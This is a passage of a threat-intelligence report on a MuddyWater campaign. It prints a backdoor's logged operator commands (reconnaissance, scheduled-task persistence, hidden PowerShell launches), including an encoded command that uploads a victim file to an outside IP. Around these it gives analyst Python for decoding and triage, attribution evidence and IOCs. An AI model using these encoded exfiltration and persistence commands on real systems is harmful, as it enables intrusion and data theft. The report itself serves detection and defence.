powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy
RemoteSigned -EncodedCommand
dwBrAG4AbABoAGEAOwAkAHcAawBuAGwAaABhAD0AIgB3AGsAbgBsAGgAYQAiADsAUwB0AGEA
cgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMA
aAAuAGUAeABlACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=

Decoded:

powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy
RemoteSigned -EncodedCommand wknlha;$wknlha="wknlha";Start-Process
c:\ProgramData\sh.exe -WindowStyle Hidden

Command #4 – Observed: 2025-10-06 11:47:03

The command attempts to run gshdoc_release_X64_GUI.exe under a new process. While the binary itself remains unidentified, its execution output was observed directly.

powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy
RemoteSigned -EncodedCommand
ZgBkAGgAYgBxAHkAcgA7ACQAZgBkAGgAYgBxAHkAcgA9ACIAZgBkAGgAYgBxAHkAcgAiADsA
UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQA
YQBcAGcAcwBoAGQAbwBjAF8AcgBlAGwAZQBhAHMAZQBfAFgANgA0AF8ARwBVAEkALgBlAHgA
ZQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A

Decoded:

powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy
RemoteSigned -EncodedCommand fdhbqyr;$fdhbqyr="fdhbqyr";Start-Process
c:\ProgramData\gshdoc_release_X64_GUI.exe -WindowStyle Hidden
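Each of the bot commands above hides its real script behind -EncodedCommand, a base64 blob of UTF-16LE text, and every decoded script opens with the same throwaway `junk;$junk="junk";` assignment. The following triage helper is an added example (not code from the report): it decodes Command #3 from above (embedded as the sample, with the blob wrapped across lines exactly as printed), extracts the Start-Process target, file paths and URLs, and records the junk-variable prefix as a fingerprint; encode_command exists only to build round-trip test input.

```python
import base64
import re

# Command #3 from the bot log above. The report wraps the blob across lines,
# and a pasted log line might too, so whitespace inside the blob is tolerated.
SAMPLE_CMDLINE = (
    "powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy "
    "RemoteSigned -EncodedCommand "
    "dwBrAG4AbABoAGEAOwAkAHcAawBuAGwAaABhAD0AIgB3AGsAbgBsAGgAYQAiADsAUwB0AGEA\n"
    "cgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMA\n"
    "aAAuAGUAeABlACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA="
)

# PowerShell accepts -e, -ec, -enc and -EncodedCommand, case-insensitively.
# The \b keeps "-ExecutionPolicy" from matching as "-e".
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\b\s+([A-Za-z0-9+/=\s]+)", re.IGNORECASE)
START_PROCESS_RE = re.compile(r"Start-Process\s+\"?([^\s\"]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
PATH_RE = re.compile(r"[A-Za-z]:\\[^\s\"';]+")
# All four decoded commands in the report start with <junk>;$<junk>="<junk>";
# a no-op assignment whose only effect is to vary the encoded blob per command.
JUNK_PREFIX_RE = re.compile(r"^([A-Za-z0-9_]+);\$\1=\"\1\";")


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    blob = re.sub(r"\s+", "", m.group(1))
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def encode_command(script: str) -> str:
    """Inverse of decode_encoded_command; used here only to build round-trip input."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def triage_powershell(cmdline: str):
    """Decode one command line and pull out the indicators an analyst wants first."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return None
    junk = JUNK_PREFIX_RE.match(script)
    return {
        "script": script,
        "start_process": START_PROCESS_RE.findall(script),
        "paths": PATH_RE.findall(script),
        "urls": URL_RE.findall(script),
        "junk_prefix": junk.group(1) if junk else None,
    }


if __name__ == "__main__":
    result = triage_powershell(SAMPLE_CMDLINE)
    for key, value in result.items():
        print(f"{key}: {value}")
```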

We’ve also observed direct execution of gshdoc_release_X64_GUI.exe and the output it produced as follows:

$ gshdoc_release_X64_GUI.exe gshdoc.exe

after Sleeping:  60
err empty command
after Sleeping:  60
err empty command
after Sleeping:  60
err empty command
after Sleeping:  60
err empty command
after Sleeping:  60
err empty command
after Sleeping:  60
err empty command
after Sleeping:  60
err empty command
after Sleeping:  60
err empty command
after Sleeping:  60
err empty command
after Sleeping:  60
err empty command
after Sleeping:  60
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2
err empty command
after Sleeping:  2

List of Executed Commands

The executed commands indicate basic reconnaissance activity, including enumeration of the current user, domain membership, privileges, and IP configuration. Additional actions include local network scanning via ping, creation of a scheduled task for persistence (schtasks /create ... novaservice.exe), and ingress tool transfer of binaries that are then launched through encoded PowerShell Start-Process commands.

--- 2026-02-01 13:50:35 --- whoami
--- 2026-02-01 12:14:33 --- Unknown command: dir
--- 2026-02-01 12:13:55 --- whoami
--- 2026-02-01 10:53:22 --- whoami
--- 2026-01-31 17:52:27 --- whoami
--- 2026-01-31 17:30:06 --- whoami
--- 2026-01-31 16:35:43 --- whoami
--- 2026-01-30 23:15:10 --- whoami
--- 2026-01-30 19:09:38 --- dir ..\desktop
--- 2026-01-30 19:08:50 --- dir
--- 2026-01-30 19:08:09 --- nslookup ad
--- 2026-01-30 19:08:06 --- ipconfig /all
--- 2026-01-30 19:08:04 --- whoami
--- 2026-01-28 17:53:20 --- whoami
--- 2026-01-28 17:53:11 --- Unknown command: whoami
--- 2026-01-28 17:13:12 --- taskkill /IM novaservice.exe
--- 2026-01-28 16:05:05 --- whoami
--- 2026-01-28 16:04:15 --- schtasks /create /sc daily /st 09:00 /tn "DailyUpdate" /tr "C:\Users\Public\Downloads\novaservice.exe"
--- 2026-01-28 15:54:06 --- whoami
--- 2026-01-28 15:53:57 --- whoami
--- 2026-01-28 15:53:52 --- Unknown command: ?
--- 2026-01-28 15:22:35 --- whoami /all
--- 2026-01-28 15:18:04 --- whoami /all
--- 2026-01-28 15:17:46 --- whoami
--- 2026-01-28 15:05:37 --- whoami
--- 2026-01-28 15:05:28 --- Unknown command: cmd
--- 2026-01-28 14:47:46 --- whoami
--- 2026-01-28 12:42:10 --- whoami
--- 2025-10-12 09:19:00 --- ping -n 2 -a 
--- 2025-10-12 08:47:54 --- ipconfig
--- 2025-10-12 08:46:28 --- powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -EncodedCommand  dgBhAGMAcgBvAHMAeQBzAGkAOwAkAHYAYQBjAHIAbwBzAHkAcwBpAD0AIgB2AGEAYwByAG8AcwB5AHMAaQAiADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAEYATQBBAFAAUAAuAGUAeABlACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=
--- 2025-10-12 08:39:00 --- nslookup ad
--- 2025-10-07 16:23:02 --- ipconfig /all
--- 2025-10-07 16:12:13 --- ipconfig /all
--- 2025-10-06 14:38:30 --- ping -n 2 -a 
--- 2025-10-06 14:38:03 --- ping -n 2 -a 
--- 2025-10-06 14:37:32 --- ping -n 2 -a 
--- 2025-10-06 12:56:44 --- ping -n 2 -a 
--- 2025-10-06 12:56:38 --- ping -n 2 -a 
--- 2025-10-06 12:54:06 --- ipconfig /all
--- 2025-10-06 12:49:28 --- net group "domain admins" /do
--- 2025-10-06 12:47:41 --- powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -EncodedCommand  dgBhAGMAcgBvAHMAeQBzAGkAOwAkAHYAYQBjAHIAbwBzAHkAcwBpAD0AIgB2AGEAYwByAG8AcwB5AHMAaQAiADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAEYATQBBAFAAUAAuAGUAeABlACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=
--- 2025-10-06 12:47:22 --- ✅ File downloaded to .\FMAPP.dll !
--- 2025-10-06 12:47:09 --- ✅ File downloaded to .\FMAPP.exe !
--- 2025-10-06 12:41:06 --- dir
--- 2025-10-06 12:40:18 --- powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -EncodedCommand  YQBqADsAJABhAGoAPQAiAGEAagAiADsAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAAgADsAIAAkAHIAZQBzAHAAIAA9ACAAJAB3AGMALgBVAHAAbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwADoALwAvADEANAAzAC4AMQA5ADgALgA1AC4ANAAxADoANAA0ADMALwBzAHUAYwBjAGUAcwBzACIALAAiAGMAOgBcAHUAcwBlAHIAcwBcAHAAdQBiAGwAaQBjAFwAZABvAHcAbgBsAG8AYQBkAHMAXABjAG8AYgBlAC0AbgBvAHQAZQBzAC4AdAB4AHQAIgApADsA
--- 2025-10-06 12:39:43 --- dir c:\users\public\downloads
--- 2025-10-06 12:39:01 --- dir
--- 2025-10-06 12:38:33 --- Unknown command: tasklist
--- 2025-10-06 12:36:47 --- net user /do
--- 2025-10-06 12:36:47 --- net user /do
--- 2025-10-06 12:36:46 --- net user /do
--- 2025-10-06 12:36:46 --- net user /do
--- 2025-10-06 12:36:46 --- net user /do
--- 2025-10-06 12:36:45 --- net user /do
--- 2025-10-06 12:36:45 --- net user /do
--- 2025-10-06 12:36:25 --- dir
--- 2025-10-06 12:36:10 --- dir c:\users\\appdata
--- 2025-10-06 12:35:41 --- whoami
--- 2025-10-06 12:35:21 --- powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -EncodedCommand  dwBrAG4AbABoAGEAOwAkAHcAawBuAGwAaABhAD0AIgB3AGsAbgBsAGgAYQAiADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMAaAAuAGUAeABlACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=
--- 2025-10-06 12:34:58 --- dir
--- 2025-10-06 12:34:46 --- ✅ File downloaded to .\sh.exe !
--- 2025-10-06 12:34:29 --- ✅ File downloaded to .\dllapp.dll !
--- 2025-10-06 12:34:10 --- cd
--- 2025-10-06 11:47:03 --- powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -EncodedCommand  ZgBkAGgAYgBxAHkAcgA7ACQAZgBkAGgAYgBxAHkAcgA9ACIAZgBkAGgAYgBxAHkAcgAiADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGcAcwBoAGQAbwBjAF8AcgBlAGwAZQBhAHMAZQBfAFgANgA0AF8ARwBVAEkALgBlAHgAZQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A
--- 2025-10-06 11:46:26 --- cd
--- 2025-10-06 11:45:42 --- gshdoc_release_X64_GUI.exe gshdoc.exe
--- 2025-10-06 11:32:14 --- dir
--- 2025-10-06 11:32:09 --- Unknown command: /promot
--- 2025-10-06 11:31:58 --- ✅ File downloaded to .\gshdoc_release_X64_GUI.exe !
--- 2025-10-06 11:31:33 --- ✅ Directory changed to c:\programdata
--- 2025-10-06 11:30:46 --- ❌ Download Failed: Access is denied. (os error 5)
--- 2025-10-06 10:57:00 --- ping -n 2 -a 
--- 2025-10-06 10:56:44 --- ipconfig /all
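The list above is easier to reason about once it is parsed. The following Python is an added example, not part of the original post or of Group-IB's tooling: it parses the bot's timestamped log format, classifies each command (or bot reply) into a coarse category and ATT&CK technique, and splits the timeline into operator sessions by idle gap, which separates the October 2025 activity from the January 2026 activity. The embedded log lines are a trimmed, constructed sample based on the list above (JSON escaping removed, the encoded PowerShell argument replaced by <blob>); the rule table and the six-hour session gap are my assumptions.

```python
import re
from collections import Counter
from datetime import datetime, timedelta

# Trimmed copy of the bot log above (constructed sample: JSON escaping removed,
# the encoded PowerShell argument shortened to <blob>, the withheld ping target left blank).
SAMPLE_LOG = r"""
--- 2026-01-28 16:04:15 --- schtasks /create /sc daily /st 09:00 /tn "DailyUpdate" /tr "C:\Users\Public\Downloads\novaservice.exe"
--- 2026-01-28 15:22:35 --- whoami /all
--- 2026-01-28 15:05:28 --- Unknown command: cmd
--- 2025-10-06 12:49:28 --- net group "domain admins" /do
--- 2025-10-06 12:47:22 --- ✅ File downloaded to .\FMAPP.dll !
--- 2025-10-06 12:47:09 --- ✅ File downloaded to .\FMAPP.exe !
--- 2025-10-06 12:40:18 --- powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -EncodedCommand <blob>
--- 2025-10-06 12:36:47 --- net user /do
--- 2025-10-06 12:35:41 --- whoami
--- 2025-10-06 11:30:46 --- ❌ Download Failed: Access is denied. (os error 5)
--- 2025-10-06 10:57:00 --- ping -n 2 -a
"""

LINE = re.compile(r"^--- (\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) --- (.*)$")

# First matching rule wins. Technique IDs are ATT&CK for Enterprise (assumed mapping).
RULES = [
    (r"^Unknown command:", "bot-error", None),
    (r"^✅ File downloaded to", "ingress-tool-transfer", "T1105"),
    (r"^❌ Download Failed", "ingress-tool-transfer (failed)", "T1105"),
    (r"^schtasks\b.*/create", "persistence", "T1053.005"),
    (r"^powershell(\.exe)?\b.*-EncodedCommand", "execution", "T1059.001"),
    (r"^whoami\b", "discovery", "T1033"),
    (r"^(ipconfig|nslookup)\b", "discovery", "T1016"),
    (r"^net user\b.*/do", "discovery", "T1087.002"),
    (r"^net user\b", "discovery", "T1087.001"),
    (r"^net group\b.*/do", "discovery", "T1069.002"),
    (r"^net group\b", "discovery", "T1069.001"),
    (r"^(dir|cd)\b", "discovery", "T1083"),
    (r"^ping\b", "discovery", "T1018"),
    (r"^tasklist\b", "discovery", "T1057"),
]


def parse_log(text):
    """Return (timestamp, command) pairs in chronological order (the bot logs newest first)."""
    entries = []
    for line in text.splitlines():
        if m := LINE.match(line.strip()):
            entries.append((datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"), m.group(2).strip()))
    return sorted(entries)


def classify(command):
    """Map one command (or bot reply) to a coarse category and ATT&CK technique."""
    for pattern, category, technique in RULES:
        if re.search(pattern, command, re.IGNORECASE):
            return category, technique
    return "other", None


def technique_counts(entries):
    """Count techniques across a set of entries; unmapped commands are skipped."""
    return Counter(t for _, cmd in entries if (t := classify(cmd)[1]))


def operator_sessions(entries, max_gap=timedelta(hours=6)):
    """Group chronological entries into sessions separated by more than max_gap of silence."""
    sessions = []
    for ts, cmd in entries:
        if sessions and ts - sessions[-1][-1][0] <= max_gap:
            sessions[-1].append((ts, cmd))
        else:
            sessions.append([(ts, cmd)])
    return sessions


if __name__ == "__main__":
    for session in operator_sessions(parse_log(SAMPLE_LOG)):
        print(session[0][0], "->", session[-1][0], dict(technique_counts(session)))
```

Run against the full list above, the session split makes the reuse pattern visible: short bursts on 6, 7 and 12 October 2025, then a cluster on 28 January 2026 that opens with whoami and ends with a scheduled-task creation. The "Unknown command:" replies are the bot rejecting input it has no handler for, which is itself useful: they show which operator inputs (?, cmd, tasklist, dir) the backdoor does not implement.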

Potential Threat Actor Information

Analysis of the bot logs suggests that the threat actor tested the backdoor on their own machine before the second operation in late January 2026. Several commands (shown below) appear to have been executed by the bot on the threat actor's own machine, judging by the usernames and directory paths recorded in the logs.

The username DontAsk was observed as the “author” and “last modified by” in the malicious Microsoft Office documents used in phishing emails. Additionally, the username Jacob was observed in previous malware samples within the PDB paths and embedded strings.

Date: 2026-01-28 15:22:35
Current working directory: C:\Users\DontAsk\Documents
Command: whoami /all
Output:
USER INFORMATION
----------------

User Name                SID
======================= ==============================================
desktop-9524r2b\dontask  S-1-5-21-644383349-457702852-3382530326-1001


GROUP INFORMATION
-----------------

Group Name                                Type            SID             Attributes
========================================  ==============  ==============  ======================================
Everyone                                  Well-known      S-1-1-0         Mandatory group, Enabled by default
NT AUTHORITY\Local account and member     Well-known      S-1-5-114       Group used for deny only
BUILTIN\Administrators                    Alias           S-1-5-32-544    Group used for deny only
BUILTIN\Performance Log Users             Alias           S-1-5-32-559    Mandatory group, Enabled by default
BUILTIN\Users                             Alias           S-1-5-32-545    Mandatory group, Enabled by default
NT AUTHORITY\INTERACTIVE                  Well-known      S-1-5-4         Mandatory group, Enabled by default
CONSOLE LOGON                             Well-known      S-1-2-1         Mandatory group, Enabled by default
NT AUTHORITY\Authenticated Users          Well-known      S-1-5-11        Mandatory group, Enabled by default
NT AUTHORITY\This Organization            Well-known      S-1-5-15        Mandatory group, Enabled by default
NT AUTHORITY\Local account                Well-known      S-1-5-113       Mandatory group, Enabled by default
LOCAL                                     Well-known      S-1-2-0         Mandatory group, Enabled by default
NT AUTHORITY\NTLM Authentication          Well-known      S-1-5-64-10     Mandatory group, Enabled by default
Mandatory Label\Medium Mandatory Level    Label           S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                 Description                     State
=============================  ==============================  ========
SeShutdownPrivilege            Shut down the system            Disabled
SeChangeNotifyPrivilege        Bypass traverse checking        Enabled
SeUndockPrivilege              Remove computer from docking    Disabled
SeIncreaseWorkingSetPrivilege  Increase a process working set  Disabled
SeTimeZonePrivilege            Change the time zone            Disabled

The output above tells us more than the user name. BUILTIN\Administrators is present in the token but marked "Group used for deny only", and the integrity label is Medium: dontask is therefore a member of the local Administrators group, but the backdoor was running under a UAC-filtered, non-elevated token (only SeChangeNotifyPrivilege is enabled). The account is a local one (the well-known NT AUTHORITY\Local account SID S-1-5-113 is present and the account RID is 1001), so the authority in the user name is the machine name rather than a domain: the hostname is desktop-9524r2b. No domain groups appear in the token, consistent with the machine not being domain-joined.
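The reading above can be automated for every whoami /all capture in a bot log. The following Python is an added example, not part of the original post or of Group-IB's tooling: it parses the whoami /all output quoted above (copied from this page, blank lines trimmed) and reports whether the backdoor ran elevated, whether the account is local, and the hostname, using only what the token itself reveals. The interpretation rules (deny-only Administrators plus a Medium label means a UAC-filtered token; S-1-5-113 marks a local account) are standard Windows token semantics, and the helper names are my own.

```python
import re

# whoami /all output captured by the bot, copied from this page (blank lines trimmed).
WHOAMI_ALL = r"""
USER INFORMATION
----------------
User Name                SID
======================= ==============================================
desktop-9524r2b\dontask  S-1-5-21-644383349-457702852-3382530326-1001

GROUP INFORMATION
-----------------
Group Name                                Type            SID             Attributes
========================================  ==============  ==============  ======================================
Everyone                                  Well-known      S-1-1-0         Mandatory group, Enabled by default
NT AUTHORITY\Local account and member     Well-known      S-1-5-114       Group used for deny only
BUILTIN\Administrators                    Alias           S-1-5-32-544    Group used for deny only
BUILTIN\Performance Log Users             Alias           S-1-5-32-559    Mandatory group, Enabled by default
BUILTIN\Users                             Alias           S-1-5-32-545    Mandatory group, Enabled by default
NT AUTHORITY\INTERACTIVE                  Well-known      S-1-5-4         Mandatory group, Enabled by default
CONSOLE LOGON                             Well-known      S-1-2-1         Mandatory group, Enabled by default
NT AUTHORITY\Authenticated Users          Well-known      S-1-5-11        Mandatory group, Enabled by default
NT AUTHORITY\This Organization            Well-known      S-1-5-15        Mandatory group, Enabled by default
NT AUTHORITY\Local account                Well-known      S-1-5-113       Mandatory group, Enabled by default
LOCAL                                     Well-known      S-1-2-0         Mandatory group, Enabled by default
NT AUTHORITY\NTLM Authentication          Well-known      S-1-5-64-10     Mandatory group, Enabled by default
Mandatory Label\Medium Mandatory Level    Label           S-1-16-8192

PRIVILEGES INFORMATION
----------------------
Privilege Name                 Description                     State
=============================  ==============================  ========
SeShutdownPrivilege            Shut down the system            Disabled
SeChangeNotifyPrivilege        Bypass traverse checking        Enabled
SeUndockPrivilege              Remove computer from docking    Disabled
SeIncreaseWorkingSetPrivilege  Increase a process working set  Disabled
SeTimeZonePrivilege            Change the time zone            Disabled
"""

# Row patterns for the three sections; header and separator lines match none of them.
USER_ROW = re.compile(r"^(\S+)\s+(S-1-[\d-]+)$")
GROUP_ROW = re.compile(r"^(.+?)\s{2,}(Well-known|Alias|Label|Group|User)\s+(S-[\d-]+)\s*(.*)$")
PRIV_ROW = re.compile(r"^(Se\w+)\s+.*\s(Enabled|Disabled)$")


def parse_whoami_all(text):
    """Split whoami /all output into user, group and privilege records."""
    section, user, groups, privs = None, None, [], []
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.endswith("INFORMATION"):
            section = line
            continue
        if section == "USER INFORMATION" and (m := USER_ROW.match(line)):
            user = {"name": m.group(1), "sid": m.group(2)}
        elif section == "GROUP INFORMATION" and (m := GROUP_ROW.match(line)):
            groups.append({"name": m.group(1), "type": m.group(2),
                           "sid": m.group(3), "attributes": m.group(4)})
        elif section == "PRIVILEGES INFORMATION" and (m := PRIV_ROW.match(line)):
            privs.append({"name": m.group(1), "state": m.group(2)})
    return {"user": user, "groups": groups, "privileges": privs}


def assess_token(parsed):
    """Answer the triage questions: which account, which host, and was the process elevated?"""
    by_sid = {g["sid"]: g for g in parsed["groups"]}
    admins = by_sid.get("S-1-5-32-544")  # BUILTIN\Administrators
    deny_only = admins is not None and "deny only" in admins["attributes"].lower()
    label = next((g for g in parsed["groups"] if g["type"] == "Label"), None)
    integrity = label["name"].split("\\")[-1].replace(" Mandatory Level", "") if label else None
    authority, _, account = parsed["user"]["name"].partition("\\")
    # S-1-5-113 (NT AUTHORITY\Local account) is only added to tokens of local accounts;
    # for those, the authority in authority\user is the machine name, not a domain.
    local_account = "S-1-5-113" in by_sid
    return {
        "account": account,
        "authority": authority,
        "account_scope": "local" if local_account else "domain-or-builtin",
        "hostname": authority if local_account else None,
        "admin_member": admins is not None,
        # Administrators present but "used for deny only" plus a Medium label is the
        # signature of a UAC-filtered token: admin user, non-elevated process.
        "uac_filtered": deny_only,
        "elevated": admins is not None and not deny_only,
        "integrity": integrity,
        "enabled_privileges": [p["name"] for p in parsed["privileges"] if p["state"] == "Enabled"],
    }


if __name__ == "__main__":
    print(assess_token(parse_whoami_all(WHOAMI_ALL)))
```

The "elevated" answer matters operationally: a UAC-filtered token cannot write to C:\ProgramData\ subtrees owned by SYSTEM or register services, which is consistent with the "Download Failed: Access is denied. (os error 5)" entry in the October log and with the operator's use of C:\Users\Public\Downloads for the later scheduled task.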

Date: 2026-01-28 12:42:10
Current working directory: C:\Users\Jacob\Documents\Char\target\x86_64-pc-windows-msvc\release
Command: whoami
Output: ultra\jacob

An interesting detail is the authority shown for the user jacob, which is ultra. whoami prints accounts as authority\user, where the authority is the domain name for a domain account and the machine name for a local account, so ultra is either the domain or the hostname of this build machine; either way it is a different machine from desktop-9524r2b.

The current working directory matches a Cargo release build directory (target\x86_64-pc-windows-msvc\release), i.e. the location where the CHAR backdoor was compiled in release mode. In addition, strings extracted from the CHAR binary reference the username Jacob in paths consistent with the per-user Rust toolchain and crate cache (Rust embeds source file paths, including those of dependencies, in panic and debug strings). The same paths were observed in the BlackBeard malware attributed to MuddyWater.

Figure 16. CHAR and BlackBeard malware Development Environment.

Figure 16. CHAR and BlackBeard malware Development Environment.

This activity suggests that the threat actor likely used the Telegram bot to test the backdoor’s functionality prior to the operation, during the period between 2026-01-28 12:42:10 and 2026-01-28 15:22:35 (UTC+3). This timeframe aligns with the preparation phase observed ahead of the January campaign.

Attribution Assessment

Group-IB attributes this campaign to MuddyWater with high confidence based on the following evidence:

  • The C2 server hosts a reverse SOCKS5 proxy module (FMAPP.dll, SHA-1 62ED16701A14CE26314F2436D9532FE606C15407) similar to the reverse SOCKS5 tool described in [1].
  • The malicious macros (SHA-256 02ccc4271362b92a59e6851ac6d5d2c07182064a602906d7166fe2867cc662a5) follow the same logic observed in multiple recent MuddyWater campaigns:
    • read UserForm1.TextBox1.Text and decode it with the same routine,
    • use the same sleep routine (four nested loops performing additions),
    • drop a file with a .log extension to either the Public user directory or the current user's Downloads directory,
    • execute the dropped file.
  • GhostFetch and GhostBackDoor employ the same string-decoding technique observed in other MuddyWater-linked malware.
  • CHAR shares its structure and development environment with the Rust-based BlackBeard malware (aka "Archer RAT", SHA-1 326b808f4f933f20e4e8686e9a6e93454c8ed334).
  • Post-exploitation activity strongly matching MuddyWater's known toolset and operational patterns.
  • Infrastructure overlap with previously identified MuddyWater C2 infrastructure (netvigil[.]org).

Conclusion

The MuddyWater APT group remains an active threat in the META region, with this operation primarily targeting organizations in MENA. The group's continued adoption of AI-assisted development, combined with ongoing work on custom malware and tooling and a diversified set of command-and-control (C2) infrastructures, underscores its intent to expand its operations.

The Group-IB Threat Intelligence team continues to closely monitor this activity in order to provide actionable intelligence that enables organizations to anticipate evolving threats and strengthen their defensive posture accordingly.

Recommendations

Organizations can reduce exposure to MuddyWater-linked activity by implementing the following measures, informed by observed tactics and techniques used across the GhostFetch and related malware families.

Strengthen Threat Intelligence and Monitoring

  • Conduct continuous threat hunting for indicators associated with GhostFetch, CHAR and related infrastructure.
  • Integrate YARA rules and Endpoint Detection and Response (EDR) detections for known MuddyWater malware families.
  • Subscribe to threat intelligence feeds to receive up-to-date Indicators of Compromise (IOCs) and Tactics, Techniques, and Procedures (TTPs) related to MuddyWater.

Enhance Email and Phishing Defenses

  • Disable Office macros by default through Group Policy, allowing execution only from signed or trusted sources, as the campaign's initial access relies on macro-enabled document variants.
  • Deploy advanced attachment sandboxing capable of simulating user interaction, as GhostFetch validates mouse movement and execution timing to evade automated analysis.
  • Conduct regular phishing simulations and awareness training for personnel, emphasizing lures that prompt users to “enable content” in attached documents.

Implement Endpoint and Access Controls

  • Restrict, monitor, and audit the use of remote monitoring and management (RMM) tools such as AnyDesk, which is leveraged as a secondary payload in this campaign.
  • Deploy and tune EDR solutions to detect reflective code loading and in-memory execution, as GhostFetch decrypts AES-encrypted payloads and loads them directly into memory.
  • Monitor for the creation of unauthorized services, such as MicrosoftVersionUpdater, and unusual modifications to the User Shell Folders\Startup registry path.

Strengthen Network and Infrastructure Security

  • Monitor and, where appropriate, restrict outbound traffic to the Telegram Bot API (api.telegram.org), as the CHAR backdoor relies on this service for command-and-control communications; hosts with no business reason to reach it are the first place to look.
  • Block known malicious domains, such as promoverse[.]org, and monitor for repeated beaconing or anomalous connections to suspicious endpoints.
  • Use network behavioral analysis to identify SOCKS5 reverse proxy activity, particularly those introduced by injected modules such as FMAPP.dll.

Build Long-Term Strategic Defense

  • Ensure internal analysis and sandbox environments are configured with more than 2 GB of RAM and at least 2 CPU cores to prevent malware like GhostFetch from identifying the environment as a sandbox and self-terminating.
  • Enforce least-privilege access controls to limit the ability of malware to install itself as a system service or establish persistent access.

Indicators of Compromise (IOCs)

Type    Value                                      Comment
------  -----------------------------------------  --------------------------------------------------------------
Domain  codefusiontech.org                         HTTP_VIP C2
Domain  promoverse.org                             GhostFetch C2
Domain  miniquest.org                              HTTP_VIP C2
Domain  jerusalemsolutions.com
IP      162.0.230.185
IP      209.74.87.100
IP      143.198.5.41
IP      209.74.87.67
SHA1    f4e0f4449dc50e33e912403082e093dd8e4bc55d   AnyDesk.exe
SHA1    3441306816018d08dd03a97ac306fac0200e9152   chrome_inject.exe
SHA1    9ca11fcbd75420bd7a578e8bf6ef855e7bd0fb8e   ex-server
SHA1    06f3b55f0d66913cd53d2f0e76a5e2d67ff8ed04   client.exe
SHA1    7bd04218276fc8f375c0ce3be43a710f6a2b4d09   AnyDesk.exe
SHA1    2f5166086da5a57d7e59a767a54ed6fe9a6db444   lpu.exe
SHA1    8c592d9ab58264e68dfe029ea90f80862c526670   067de891d4624fc09de1c690b01d8bf477f69f0ce81f8101b21b3549
SHA1    f779a3b1dcc0c3aacacf7ebfa4ed57d53af7e26c   data.bin
SHA1    2993b0ab9786ddc29eb9cf1ace4a28c6e34ea4fb   Performance.doc
SHA1    e3cc95ca6e271ddf04cd88c85051b2cc9ce04e8e   resocks-64.exe
